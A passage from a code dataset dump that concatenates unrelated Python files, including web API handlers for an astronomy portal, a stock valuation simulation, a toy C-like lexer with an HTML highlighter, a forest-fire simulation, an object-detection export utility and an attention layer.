\"\"\"\n ---\n description: Delete a source\n parameters:\n - in: path\n name: source\n schema:\n Source\n responses:\n 200:\n content:\n application/json:\n schema: Success\n \"\"\"\n s = Source.get_if_owned_by(source_id, self.current_user)\n DBSession.query(Source).filter(Source.id == source_id).delete()\n DBSession().commit()\n\n return self.success(action='skyportal/FETCH_SOURCES')\n\n\nclass FilterSourcesHandler(BaseHandler):\n @auth_or_token\n def post(self):\n data = self.get_json()\n info = {}\n if 'pageNumber' in data:\n page = int(data['pageNumber'])\n already_counted = True\n else:\n page = 1\n already_counted = False\n info['pageNumber'] = page\n q = Source.query.filter(Source.id.in_(DBSession.query(\n GroupSource.source_id).filter(GroupSource.group_id.in_(\n [g.id for g in self.current_user.groups]))))\n\n if data['sourceID']:\n q = q.filter(Source.id.contains(data['sourceID'].strip()))\n if data['ra'] and data['dec'] and data['radius']:\n ra = float(data['ra'])\n dec = float(data['dec'])\n radius = float(data['radius'])\n q = q.filter(Source.ra <= ra + radius)\\\n .filter(Source.ra >= ra - radius)\\\n .filter(Source.dec <= dec + radius)\\\n .filter(Source.dec >= dec - radius)\n if data['startDate']:\n start_date = arrow.get(data['startDate'].strip())\n q = q.filter(Source.last_detected >= start_date)\n if data['endDate']:\n end_date = arrow.get(data['endDate'].strip())\n q = q.filter(Source.last_detected <= end_date)\n if data['simbadClass']:\n q = q.filter(func.lower(Source.simbad_class) ==\n data['simbadClass'].lower())\n if data['hasTNSname']:\n q = q.filter(Source.tns_name.isnot(None))\n\n if already_counted:\n info['totalMatches'] = int(data['totalMatches'])\n else:\n info['totalMatches'] = q.count()\n info['sources'] = q.limit(SOURCES_PER_PAGE).offset(\n (page - 1) * SOURCES_PER_PAGE).all()\n\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n\n return self.success(data=info)\n\n\nclass SourcePhotometryHandler(BaseHandler):\n @auth_or_token\n def get(self, source_id):\n \"\"\"\n ---\n description: Retrieve a source's photometry\n parameters:\n - in: path\n name: source_id\n required: true\n schema:\n type: string\n responses:\n 200:\n content:\n application/json:\n schema: ArrayOfPhotometrys\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n source = Source.query.get(source_id)\n if not source:\n return self.error('Invalid source ID.')\n if not set(source.groups).intersection(set(self.current_user.groups)):\n return self.error('Inadequate permissions.')\n return self.success(data={'photometry': source.photometry})\n","sub_path":"skyportal/handlers/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":9726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"357504800","text":"\nimport datetime as dt\n#import math as m\nimport numpy as np\nimport random as r\nimport matplotlib.pyplot as plt\nimport fcff\n\ndef years(days):\n return days / 365\n\nformat = '%d-%m-%y'\nnow = dt.datetime.now()\nttm = dt.datetime.strptime('31-12-18', format) - dt.datetime.now()\nT = years(ttm.days)\n\nshares = 762.409 # millions of shares\nsales = 7017 # last\nnwc = -1856 # last\ndebt = 8365 # last\ncash = 4853 #last\ngrowth_base = np.array([9.57, 5.31, 0.64, 1.87, 2.77, 3.44, 3.95, 4.35, 4.67, 4.93]) / 100\ngrowth_owl = np.array([11.27, 35.50, 42.02, 20.53, 19.70, 18.27, 16.61, 14.94, 13.36, 11.93]) / 100\nterminal_g = 0.03\ngross_margin = 0.2502\ntax = 0.34\nd_a = 0.1225\ncapex = 0.0214\ntarget_nwc = 0.05\nwacc = 0.0926\n\n# simulations\nequity = []\nfor j in range(1,50000):\n\n if r.random() < 0.1: # OWL success\n growth = growth_owl\n else:\n growth = growth_base\n\n g = np.exp( np.random.normal(growth + 0.5 * 0.0455**2.0, 0.0455, 10) ) - 1\n margin = np.random.normal(gross_margin, 0.0446, 1)\n k = np.random.normal(wacc, wacc*0.05, 1)\n\n dummy = fcff.enterprise_value(sales, g, terminal_g, margin, tax, d_a, capex, nwc, target_nwc, k, T) - debt + cash\n equity.append(dummy[0])\n\nequity.sort()\nshare = np.array(equity) / shares\nmean = np.mean(share)\nmedian = np.percentile(share, 50)\nlower = np.percentile(share, 5)\nupper = np.percentile(share, 95)\n#print(equity)\nprint(f\"\\nmean is {mean:.2f}\")\nprint(f\"median is {median:.2f}\")\nprint(f\" 5% quantile is {lower:.2f}\")\nprint(f\"95% quantile is {upper:.2f}\\n\")\n\n#%matplotlib inline\nplt.hist(share, density=1, bins=100)\nplt.xlim([0,250])\n#plt.xlabel('Equity value')\n#plt.ylabel('Probability')\nplt.title('Price per share')\n#plt.grid(True)\nplt.show()\n","sub_path":"simulations.py","file_name":"simulations.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374917975","text":"\n\nfrom xai.brain.wordbase.adjectives._provincial import _PROVINCIAL\n\n#calss header\nclass _PROVINCIALS(_PROVINCIAL, ):\n\tdef __init__(self,): \n\t\t_PROVINCIAL.__init__(self)\n\t\tself.name = \"PROVINCIALS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"provincial\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_provincials.py","file_name":"_provincials.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600076766","text":"# Copyright (c) 2018-2021, Texas Instruments\n# All Rights Reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport os\nimport numpy as np\nimport torch\nfrom .quantize import is_mmdet_quant_module\nfrom .proto import tidl_meta_arch_mmdet_pb2\nfrom google.protobuf import text_format\n\n__all__ = ['save_model_proto']\n\n\ndef save_model_proto(cfg, model, input, output_filename, input_names=None, feature_names=None, output_names=None):\n output_filename = os.path.splitext(output_filename)[0] + '.prototxt'\n input = input[0] if isinstance(input, (list,tuple)) and \\\n isinstance(input[0], (torch.Tensor, np.ndarray)) else input\n input_size = input.size() if isinstance(input, torch.Tensor) else input\n model = model.module if is_mmdet_quant_module(model) else model\n is_ssd = hasattr(cfg.model, 'bbox_head') and ('SSD' in cfg.model.bbox_head.type)\n is_fcos = hasattr(cfg.model, 'bbox_head') and ('FCOS' in cfg.model.bbox_head.type)\n is_retinanet = hasattr(cfg.model, 'bbox_head') and ('Retina' in cfg.model.bbox_head.type)\n is_yolov3 = hasattr(cfg.model, 'bbox_head') and ('YOLOV3' in cfg.model.bbox_head.type)\n is_yolox = hasattr(cfg.model, 'bbox_head') and ('YOLOXHead' in cfg.model.bbox_head.type)\n input_names = input_names or ('input',)\n\n if is_ssd:\n _save_mmdet_proto_ssd(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n elif is_retinanet:\n _save_mmdet_proto_retinanet(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n elif is_yolov3:\n _save_mmdet_proto_yolov3(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n elif is_yolox:\n _save_mmdet_proto_yolox(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n #\n\n\n###########################################################\ndef _create_rand_inputs(input_size, is_cuda=False):\n x = torch.rand(input_size)\n x = x.cuda() if is_cuda else x\n return x\n\n\ndef _save_mmdet_onnx(cfg, model, input_list, output_filename, input_names=None, proto_names=None, output_names=None,\n opset_version=11):\n #https://github.com/open-mmlab/mmdetection/pull/1082\n assert hasattr(model, 'forward_dummy'), 'wrting onnx is not supported by this model'\n model.eval()\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n forward_backup = model.forward #backup forward\n model.forward = model.forward_dummy #set dummy forward\n torch.onnx.export(\n model,\n input_list,\n output_filename,\n input_names=input_names,\n output_names=proto_names,\n export_params=True,\n keep_initializers_as_inputs=True,\n do_constant_folding=True,\n verbose=False,\n opset_version=opset_version)\n model.forward = forward_backup #restore forward\n\n\n###########################################################\ndef _save_mmdet_proto_ssd(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n num_proto_names = len(proto_names)//2\n cls_proto_names = proto_names[:num_proto_names]\n reg_proto_names = proto_names[num_proto_names:]\n bbox_head = model.bbox_head\n anchor_generator = bbox_head.anchor_generator\n\n prior_box_param = []\n for h_idx in range(num_proto_names):\n min_size=[anchor_generator.min_sizes[h_idx]]\n max_size=[anchor_generator.max_sizes[h_idx]]\n aspect_ratio=anchor_generator.ratios[h_idx][2::2]\n step=anchor_generator.strides[h_idx]\n step=step[0] if isinstance(step,(tuple,list)) else step\n prior_box_param.append(tidl_meta_arch_mmdet_pb2.PriorBoxParameter(min_size=min_size, max_size=max_size,\n aspect_ratio=aspect_ratio, step=step,\n variance=bbox_head.bbox_coder.stds, clip=False, flip=True))\n #\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=bbox_head.num_classes+1, share_location=True,\n background_label_id=bbox_head.num_classes, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CENTER_SIZE, keep_top_k=200,\n confidence_threshold=0.3)\n\n ssd = tidl_meta_arch_mmdet_pb2.TidlMaCaffeSsd(box_input=reg_proto_names, class_input=cls_proto_names,\n output=output_names, prior_box_param=prior_box_param,\n in_width=input_size[3], in_height=input_size[2],\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='ssd', caffe_ssd=[ssd])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)\n\n\n###########################################################\ndef _save_mmdet_proto_retinanet(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n num_proto_names = len(proto_names)//2\n cls_proto_names = proto_names[:num_proto_names]\n reg_proto_names = proto_names[num_proto_names:]\n bbox_head = model.bbox_head\n anchor_generator = bbox_head.anchor_generator\n\n background_label_id = -1 if bbox_head.use_sigmoid_cls else bbox_head.num_classes\n num_classes = bbox_head.num_classes if bbox_head.use_sigmoid_cls else bbox_head.num_classes+1\n score_converter = tidl_meta_arch_mmdet_pb2.SIGMOID if bbox_head.use_sigmoid_cls else tidl_meta_arch_mmdet_pb2.SOFTMAX\n anchor_param = tidl_meta_arch_mmdet_pb2.RetinaNetAnchorParameter(aspect_ratio=anchor_generator.ratios,\n octave_base_scale=anchor_generator.octave_base_scale,\n scales_per_octave=anchor_generator.scales_per_octave)\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=num_classes, share_location=True,\n background_label_id=background_label_id, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CENTER_SIZE, keep_top_k=200,\n confidence_threshold=0.3)\n\n retinanet = tidl_meta_arch_mmdet_pb2.TidlMaRetinaNet(box_input=reg_proto_names, class_input=cls_proto_names,\n output=output_names, x_scale=1.0, y_scale=1.0, width_scale=1.0, height_scale=1.0,\n in_width=input_size[3], in_height=input_size[2],\n score_converter=score_converter, anchor_param=anchor_param,\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='retinanet', tidl_retinanet=[retinanet])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)\n\n\n###########################################################\ndef _save_mmdet_proto_yolov3(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n bbox_head = model.bbox_head\n anchor_generator = bbox_head.anchor_generator\n base_sizes = anchor_generator.base_sizes\n\n background_label_id = -1\n num_classes = bbox_head.num_classes\n #score_converter = tidl_meta_arch_mmdet_pb2.SIGMOID\n\n yolo_params = []\n for base_size_id, base_size in enumerate(base_sizes):\n yolo_param = tidl_meta_arch_mmdet_pb2.TIDLYoloParams(input=proto_names[base_size_id],\n anchor_width=[b[0] for b in base_size],\n anchor_height=[b[1] for b in base_size])\n yolo_params.append(yolo_param)\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=num_classes, share_location=True,\n background_label_id=background_label_id, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CENTER_SIZE_EXP, keep_top_k=200,\n confidence_threshold=0.3)\n\n yolov3 = tidl_meta_arch_mmdet_pb2.TidlYoloOd(name='yolo_v3', output=output_names,\n in_width=input_size[3], in_height=input_size[2],\n yolo_param=yolo_params,\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='yolo_v3', tidl_yolo=[yolov3])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)\n\n\n###########################################################\ndef _save_mmdet_proto_yolox(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n bbox_head = model.bbox_head\n # anchor_generator = bbox_head.anchor_generator\n base_sizes = model.bbox_head.strides\n\n background_label_id = -1\n num_classes = bbox_head.num_classes\n #score_converter = tidl_meta_arch_mmdet_pb2.SIGMOID\n\n yolo_params = []\n for base_size_id, base_size in enumerate(base_sizes):\n yolo_param = tidl_meta_arch_mmdet_pb2.TIDLYoloParams(input=proto_names[base_size_id],\n anchor_width=[base_size],\n anchor_height=[base_size])\n yolo_params.append(yolo_param)\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=num_classes, share_location=True,\n background_label_id=background_label_id, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CODE_TYPE_YOLO_X, keep_top_k=200,\n confidence_threshold=0.3)\n\n yolox = tidl_meta_arch_mmdet_pb2.TidlYoloOd(name='yolox', output=output_names,\n in_width=input_size[3], in_height=input_size[2],\n yolo_param=yolo_params,\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='yolox', tidl_yolo=[yolox])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)","sub_path":"mmdet/utils/save_model.py","file_name":"save_model.py","file_ext":"py","file_size_in_byte":12917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549941156","text":"from ply import lex\nimport re\nimport sys\nlineno = 0\n#Personal Groups\n\nkeywords = {\n 'auto':'AUTO',\n 'break':'BREAK',\n 'case':'CASE',\n # 'catch':'CATCH',\n 'char':'CHAR',\n 'class':'CLASS',\n 'continue':'CONTINUE',\n 'default':'DEFAULT',\n 'delete':'DELETE',\n 'do':'DO',\n 'else':'ELSE',\n 'float':'FLOAT',\n 'for':'FOR',\n 'if':'IF',\n 'int':'INT',\n 'new':'NEW',\n 'print_int' : 'PRINTINT',\n 'print_char' : 'PRINTCHAR',\n 'print_float' : 'PRINTFLOAT',\n 'return':'RETURN',\n 'scan_int' : 'SCANINT',\n 'scan_char' : 'SCANCHAR',\n 'sizeof':'SIZEOF',\n 'switch':'SWITCH',\n 'struct' : 'STRUCT',\n 'this':'THIS',\n # 'throw':'THROW',\n # 'try':'TRY',\n # 'typedef':'TYPEDEF',\n # 'type' : 'TYPE',\n # 'template' : 'TEMPLATE',\n 'while':'WHILE',\n}\n\n# List of token names. \ntokens = [\n # id and no\n 'IDENTIFIER',\n 'NUMBER',\n 'DECIMAL',\n\n # arithematic operator\n 'PLUSOP',\n 'MINUSOP',\n 'DIVOP',\n 'MULTOP',\n 'OROP',\n 'BANDOP',\n 'ANDOP',\n 'MODOP',\n 'PLUSEQOP',\n 'MINUSEQOP',\n 'MULTEQOP',\n 'DIVEQOP',\n 'XOROP',\n 'BNOP',\n 'BOROP',\n\n #comparison operator, =\n 'EQCOMP',\n 'NEQCOMP',\n 'GTCOMP',\n 'GTECOMP',\n 'LTCOMP',\n 'LTECOMP',\n 'EQUAL',\n\n # Parenthesis\n 'LPAREN',\n 'RPAREN',\n 'LCPAREN',\n 'RCPAREN',\n 'LSPAREN',\n 'RSPAREN',\n\n # OTHER\n 'COMMA',\n 'DOT',\n 'SEMICOLON',\n 'COLON',\n 'DOUBLECOLON',\n 'SCHAR',\n 'STRING_L',\n 'NOTSYM',\n 'QUESMARK',\n 'ARROW',\n 'MODEQOP',\n 'DPLUSOP',\n 'LSHIFT',\n 'RSHIFT',\n 'DMINUSOP',\n 'LTEMPLATE',\n 'RTEMPLATE', \n] + list(keywords.values())\n\n# Regular expression rules for simple tokens\n\n# RegEx id\ndef t_IDENTIFIER(t):\n r'[a-zA-Z_][a-zA-Z0-9_]*'\n t.type = keywords.get(t.value, 'IDENTIFIER')\n return t\n\ndef t_DECIMAL(t):\n #r'((\\d+\\.\\d+[eE]([+-])?\\d+)|(\\d+[eE]([+-])?\\d+)|(\\d+\\.\\d+)|(\\.\\d+)|(\\d+))'\n r'(\\d+\\.\\d+)([eE][-+]?\\d+)?'\n t.value=float(t.value)\n return t\n\ndef t_NUMBER(t):\n #r'((\\d+\\.\\d+[eE]([+-])?\\d+)|(\\d+[eE]([+-])?\\d+)|(\\d+\\.\\d+)|(\\.\\d+)|(\\d+))'\n r'\\d+([eE][-+]?\\d+)?'\n t.value=int(t.value)\n return t\n\n# Arithematic Operator\nt_PLUSOP = r'\\+'\nt_MINUSOP = r'-'\nt_DIVOP = r'/'\nt_MULTOP = r'\\*'\nt_MODOP = r'\\%'\nt_XOROP = r'\\^'\n\nt_OROP = r'\\|\\|'\nt_BANDOP = r'\\&'\nt_BOROP = r'\\|'\nt_ANDOP = r'\\&\\&'\n\nt_PLUSEQOP = r'\\+='\nt_MODEQOP = r'\\%\\='\nt_MINUSEQOP = r'-='\nt_MULTEQOP = r'\\*='\nt_DIVEQOP = r'/='\n\nt_DPLUSOP = r'\\+\\+'\nt_DMINUSOP = r'--'\nt_BNOP = r'\\~'\nt_LSHIFT = r'\\<\\<'\nt_RSHIFT = r'\\>\\>'\n\n\nt_LTEMPLATE = r'<\\|'\nt_RTEMPLATE = r'\\|>'\n\n\n# Comparison Operator\nt_EQCOMP = r'=='\nt_NEQCOMP = r'!='\nt_GTCOMP = r'>'\nt_GTECOMP = r'>='\nt_LTCOMP = r'<'\nt_LTECOMP = r'<='\nt_EQUAL = r'='\n\n# Parenthesis\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LCPAREN = r'\\{'\nt_RCPAREN = r'\\}'\nt_LSPAREN = r'\\['\nt_RSPAREN = r'\\]'\n\n# Other\nt_COMMA = r','\nt_DOT = r'\\.'\nt_SEMICOLON = r';'\nt_COLON = r':'\nt_DOUBLECOLON = r'::'\nt_SCHAR = r'\\'.\\''\nt_STRING_L = r'\\\".*\\\"'\nt_NOTSYM = r'\\!'\nt_QUESMARK = r'\\?'\nt_ARROW = r'-\\>'\n\n\n# track line no.\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n global lineno\n lineno = lineno + 1\n\n# comment\ndef t_COMMENT(t):\n r'( (//)[^\\n\\r]* ) |(/\\*([^*]|[\\r\\n]|(\\*+([^*/]|[\\r\\n])))*\\*+/)'\n t.value = str(t.value)\n t.type = 'COMMENT'\n pass\n\n\n# A string containing ignored characters (spaces and tabs)\nt_ignore = ' \\t'\n\n# Error handling rule\ndef t_error(t):\n tk = re.split('[ \\t]', t.value)[0]\n print(\"Illegal token '%s'\" % tk)\n exit(-1)\n t.lexer.skip(len(tk))\n\n# Build the lexer\nlexer = lex.lex(debug = 0)\n\n\n\ndef find_column(input, token):\n line_start = input.rfind('\\n', 0, token.lexpos) + 1\n return (token.lexpos - line_start) + 1\n \nif __name__ == \"__main__\":\n \n\n for arg in arglist[1:]:\n if arg.split('=')[0] == \"--cfg\" :\n cfg_file=arg.split('=')[1]\n elif arg.split('=')[0] == \"--output\" :\n output_file=arg.split('=')[1]\n else:\n input_file=arg\n\n color_dict={}\n with open(cfg_file, \"r\") as f:\n for line in f:\n if line:\n (key,val) = line.split(':')\n color_dict[str(key).strip()] = str(val).strip()\n\n \n\n lines=[]\n with open(input_file, \"r\") as f:\n for line in f:\n lines.append(line)\n code = ''.join(lines)\n #print(code)\n lexer.input(code)\n\n meta_bgcolor = color_dict.get(\"META_BGCOLOR\", \"#121e1f\")\n bold_token = keywords\n code_out = \"
\\n\"\n    cur=1\n    prev=1\n    for tok in lexer:\n        line = tok.lineno\n        if prev != line :\n            cur=1\n            code_out += \"\\n\"*(line-prev)\n            prev=line\n        col = find_column(code, tok)\n        bold = bold_token.get(tok.value, \"\")\n        if bold != \"\":\n            bold = \"; font-weight: bold\"\n            keyword_def= color_dict.get(\"KEYWORDS\", \"rgb(170,170,170)\")\n            color = color_dict.get(str(tok.type), keyword_def)\n        else:\n            color = color_dict.get(str(tok.type), \"rgb(170,170,170)\")\n        \n        span = \"\"\n        code_out = code_out + \" \"*(col-cur) + span + tok.value + \"\"\n        cur=col + len(str(tok.value))\n    code_out = code_out + \"\\n
\"\n\n with open(output_file, \"w\") as f:\n f.write(code_out)\n","sub_path":"milestone4(final_project)/src/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"624921373","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pylab as pyl\nimport matplotlib.animation as animation\nimport random\n\nempty = 0\ntree = 1\nburning = 2\n\n# probability that a tree is immune from burning by a tree or lightning\nprobImmune = 0.25\n\n# probability that the tree adjacent will burn \nburnProbability = 0.1\n\n# probability of lightning hitting a site\nprobLightning = 0.0000001\n\n# probability that a tree is burning initially.\nprobBurning = 0.0005\n\n# probability that a site is initially occupied by tree\nprobTree = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n\nclass Cell:\n def __init__(self, x, y, p,state=tree):\n self.x = x\n self.y = y\n if random.uniform(0,1) < probTree[p]:\n if random.uniform(0,1) < probBurning:\n \n self.state = burning\n else:\n \n self.state = tree\n else:\n self.state = empty\n\n \n def setState(self, N, E, S, W):\n \"\"\"\n set the state of site at time t+1\n input :\n\n N, NE, E, SE, S, SW, W, NW = temperatures at the neighbour cells\n diffRate = rate of diffusion\n siteTemp = temperature of the site at time t\n ouput : \n\n temperature of site at time t+1 \n\n \"\"\"\n \n \n if (self.state == burning):\n \n self.state = empty \n \n\n if self.state == empty:\n self.state = empty\n\n if self.state == tree:\n if N == burning or S == burning or E == burning or W == burning:\n if random.uniform(0,1) < probImmune:\n self.state = tree\n else:\n self.state = burning\n\n elif random.uniform(0,1) < probLightning*(1-probImmune):\n \n self.state = burning\n else:\n self.state = self.state\n \n return \n\n\nn = 50\nT = 50\nbar = []\n\nfor i in range(n):\n for j in range(n):\n bar.append(Cell(i,j,0))\nbar = np.reshape(np.array(bar), [n,n])\n\n\n\nall_states = np.zeros([T,n,n])\n\nfor t in range(T):\n for i in range(n):\n for j in range(n):\n all_states[t][i][j] = bar[i][j].state\n \nsims = 5\nprobs = np.array([[0 for x in range(sims)] for y in range(len(probTree))])\n\nfor p in range(len(probTree)): \n n = 50\n T = 50\n bar = []\n\n for i in range(n):\n for j in range(n):\n bar.append(Cell(i,j, p))\n bar = np.reshape(np.array(bar), [n,n])\n\n init_forest_cov = 0\n for s in range(sims):\n for i in range(1,n-1):\n for j in range(1,n-1): \n if bar[i][j].state != empty:\n init_forest_cov = init_forest_cov + 1\n print(init_forest_cov,'initial')\n\n all_states = np.zeros([T,n,n])\n print(np.shape(all_states))\n for t in range(T):\n for i in range(n):\n for j in range(n):\n all_states[t][i][j] = bar[i][j].state\n\n\n forest_cov = 0\n\n for t in range(1,T):\n\n count=0\n for i in range(1,n-1):\n for j in range(1,n-1): \n bar[i][j].setState(bar[i-1][j].state, bar[i][j+1].state, bar[i+1][j].state, bar[i][j-1].state)\n all_states[t][i][j] = bar[i][j].state\n\n # periodic boundary condition\n\n for i in range(n):\n bar[i][n-1].state = bar[i][1].state\n bar[i][0].state = bar[i][n-2].state\n all_states[t][i][n-1] = bar[i][n-1].state\n all_states[t][i][0] = bar[i][0].state\n\n for j in range(n):\n bar[0][j].state = bar[n-2][j].state\n bar[n-1][j].state = bar[1][j].state\n all_states[t][0][j] = bar[0][j].state\n all_states[t][n-1][j] = bar[n-1][j].state\n\n\n \n print(forest_cov,'before loop')\n for i in range(1,n-1):\n for j in range(1,n-1): \n if bar[i][j].state != empty:\n forest_cov = forest_cov + 1\n\n print(forest_cov, probTree[p])\n probs[p][s] = forest_cov\n\n\n\nmeans = np.zeros(len(probs))\nfor i in range(len(means)):\n means[i] = probs[i].mean()\n\nplt.plot(probTree,means/((n-1)*(n-1)), 'b-o')\n\nplt.xlabel('Initial density of trees')\nplt.ylabel('Final density of trees')\n#plt.xticks(ticks=np.arange(0,9),labels=probs)\nplt.savefig('neigh_burn_graph.eps')\nplt.show() \n\n","sub_path":"Lab-10/periodic_graphs.py","file_name":"periodic_graphs.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231828489","text":"import sys\nimport qm\nimport atexit\nimport gc\nimport qm.cuda\nimport pylab\n\natexit.register(qm.cuda_thread_exit)\n\nN = 2048\ndt = 1.0/4096.0\nf_min = 40.0\n\nm1 = m2 = 1.4\namp = qm.sp_amplitude(None,m1,m2,f_min,qm.schwarzschild_isco(m1+m2),N,dt,None)\namp_gpu = qm.cuda.cuda_sp_amplitude(None,m1,m2,f_min,qm.schwarzschild_isco(m1+m2),N,dt,None)\n\namp_gpu_local=qm.cplx_vec_t_from_gpu(amp_gpu);\n\ndiffre=amp.get_real()-amp_gpu_local.get_real();\n\npylab.subplot(211)\npylab.plot(diffre)\nax=pylab.gca()\nax.yaxis.major.formatter.set_powerlimits((0,0))\npylab.ylabel('sp_amplitude on CPU vs GPU Absolute Error')\n\npylab.subplot(212)\npylab.plot(amp.get_real())\npylab.plot(amp_gpu_local.get_real());\nax=pylab.gca()\nax.yaxis.major.formatter.set_powerlimits((0,0))\npylab.ylabel('sp_amplitude on CPU & GPU')\n\npylab.savefig('spa_amp_compare.png')\n\n\n\n\n","sub_path":"test/cuda/cuda_sp_amp_test.py","file_name":"cuda_sp_amp_test.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516844309","text":"def rev(s):\n return s[::-1]\n \ndef pal(s):\n r = rev(s)\n \n if s==r:\n return True\n return False\n \ns= \"dad\"\nans= pal(s)\n\nif ans==1:\n print(\"pallindrom\")\n \nelse:\n print(\"not pallindrom\")\n\n","sub_path":"stringpallindrom.py","file_name":"stringpallindrom.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"288476369","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# Default: Luong Attention\nclass Attention(nn.Module):\n def __init__(self, dim):\n super(Attention, self).__init__()\n self.linear_out = nn.Linear(dim*2, dim)\n self.mask = None\n\n def set_mask(self, mask):\n self.mask = mask\n\n def forward(self, output, context):\n batch_size = output.size(0)\n hidden_size = output.size(2)\n input_size = context.size(1)\n # (batch, out_len, dim) * (batch, in_len, dim) -> (batch, out_len, in_len)\n attn = torch.bmm(output, context.transpose(1, 2))\n if self.mask is not None:\n attn.data.masked_fill_(self.mask, -float('inf'))\n attn = F.softmax(attn.view(-1, input_size), dim=1).view(batch_size, -1, input_size)\n\n # (batch, out_len, in_len) * (batch, in_len, dim) -> (batch, out_len, dim)\n mix = torch.bmm(attn, context)\n\n # concat -> (batch, out_len, 2*dim)\n combined = torch.cat((mix, output), dim=2)\n # output -> (batch, out_len, dim)\n output = 